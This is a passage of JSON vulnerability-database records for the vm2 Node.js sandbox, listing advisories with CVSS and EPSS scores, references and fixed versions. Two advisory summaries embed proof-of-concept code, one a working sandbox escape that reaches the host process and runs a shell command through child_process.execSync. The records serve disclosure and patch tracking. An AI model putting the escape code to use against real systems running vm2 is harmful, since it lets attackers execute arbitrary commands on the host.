machine.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23449","reference_id":"","reference_type":"","scores":[{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84756","published_at":"2026-06-07T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84759","published_at":"2026-06-09T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84745","published_at":"2026-06-08T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84734","published_at":"2026-06-04T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84758","published_at":"2026-06-05T12:55:00Z"},{"value":"0.02202","scoring_system":"epss","scoring_elements":"0.84762","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-23449"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886"},{"reference_url":"https://github.com/patriksimek/vm2/issues/363","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/363"},{"
reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.4","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.4"},{"reference_url":"https://security.netapp.com/advisory/ntap-20211029-0010","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20211029-0010"},{"reference_url":"https://security.netapp.com/advisory/ntap-20211029-0010/","reference_id":"","reference_type":"","scores":[],"url":"https://security.netapp.com/advisory/ntap-20211029-0010/"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-VM2-1585918","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-VM2-1585918"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23449","reference_id":"CVE-2021-23449","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23449"},{"reference_url":"https://github.com/advisories/GHSA-rjf2-j2r6-q8gr","reference_id":"GHSA-rjf2-j2r6-q8gr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rjf2-j2r6-q8gr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/pack
ages/59309?format=json","purl":"pkg:npm/vm2@3.9.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p1e-z4rv-1bfn"},{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-7k1u-5wfd-sfgn"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.4"}],"aliases":["CVE-2021-23449","GHSA-rjf2-j2r6-q8gr"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tux1-cjy7-53bf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45649?format=json","vulnerability_id":"VCID-v8ca-8eew-aqah","summary":"vm2 Sandbox Escape vulnerability\nIn vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary 
code.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37903.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37903.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37903","reference_id":"","reference_type":"","scores":[{"value":"0.36936","scoring_system":"epss","scoring_elements":"0.97244","published_at":"2026-06-05T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.97418","published_at":"2026-06-07T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.97421","published_at":"2026-06-09T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.9742","published_at":"2026-06-08T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.97419","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37903"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://security.netapp.com/advisory/ntap-20230831-0007","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20230831-0007"},{"reference_url":"https://security.netapp.com/advisory/ntap-20241108-0002","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20241108-0002"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2224969","reference_id":"2224969","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2224969"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37903","reference_id":"CVE-2023-37903","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37903"},{"reference_url":"https://github.com/advisories/GHSA-g644-9gfx-q4q4","reference_id":"GHSA-g644-9gfx-q4q4","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g644-9gfx-q4q4"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4","reference_id":"GHSA-g644-9gfx-q4q4","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4"}],"fixed_packages":[],"aliases":["CVE-2023-37903","GHSA-g644-9gfx-q4q4"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v8ca-8eew-aqah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93123?format=json","vulnerability_id":"VCID-wpfa-k33c-zff4","summary":"vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`\n### Summary\n\nVM2 suffers from a sandbox breakout 
vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nThe new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst a = [];\nObject.defineProperty(Array.prototype, 0, {\n\tset(value) {\n\t\ta.f = Buffer.prototype.inspect;\n\t\tvalue.arr.f.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('touch pwned');\n\t}\n});\nnew Buffer(a);\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44008","reference_id":"","reference_type":"","scores":[{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24093","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.23969","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.23964","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24021","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24075","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44008"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}]
,"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-14T18:21:34Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44008","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44008"},{"reference_url":"https://github.com/advisories/GHSA-9qj6-qjgg-37qq","reference_id":"GHSA-9qj6-qjgg-37qq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9qj6-qjgg-37qq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114480?format=json","purl":"pkg:npm/vm2@3.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ue7f-8en8-cufa"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.2"}],"aliases":["CVE-2026-44008","GHSA-9qj6-qjgg
-37qq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wpfa-k33c-zff4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61342?format=json","vulnerability_id":"VCID-ws53-29ft-u7dp","summary":"vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24781.json","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24781.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24781","reference_id":"","reference_type":"","scores":[{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.4019","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.4023","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.40233","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.40204","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.40176","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24781"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_ele
ments":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189"},{"reference_url":"https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c"},{"reference_url":"https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm
2/security/advisories/GHSA-v37h-5mfm-c47c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24781","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24781"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466531","reference_id":"2466531","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466531"},{"reference_url":"https://github.com/advisories/GHSA-v37h-5mfm-c47c","reference_id":"GHSA-v37h-5mfm-c47c","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v37h-5mfm-c47c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-24781","GHSA-v37h-5mfm-c47c"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ws53-29ft-u7dp"},{"u
rl":"http://public2.vulnerablecode.io/api/vulnerabilities/61346?format=json","vulnerability_id":"VCID-xe8d-un3q-myc9","summary":"vm2: vm2: Arbitrary code execution due to sandbox breakout","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24118.json","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24118.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24118","reference_id":"","reference_type":"","scores":[{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.3892","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.3896","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.38964","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.38936","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.38909","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24118"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_el
ements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3"},{"reference_url":"https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24118","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"C
VSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24118"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466502","reference_id":"2466502","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466502"},{"reference_url":"https://github.com/advisories/GHSA-grj5-jjm8-h35p","reference_id":"GHSA-grj5-jjm8-h35p","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-grj5-jjm8-h35p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-24118","GHSA-grj5-jjm8-h35p"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xe8d-un3q-myc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91965?format=json","vulnerability_id":"VCID-zeup-86es-xkc4","summary":"vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`\n### Summary\n\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.\n\n### Details\n\nIt is still possible to get access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\n 
globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']\n`));\n```","references":[{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f"},{"reference_url":"https://github.com/advisories/GHSA-2cm2-m3w5-gp2f","reference_id":"GHSA-2cm2-m3w5-gp2f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2cm2-m3w5-gp2f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114480?format=json","purl":"pkg:npm/vm2@3.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ue7f-8en8-cufa"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.2"}],"aliases":["GHSA-2cm2-m3w5-gp2f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecod
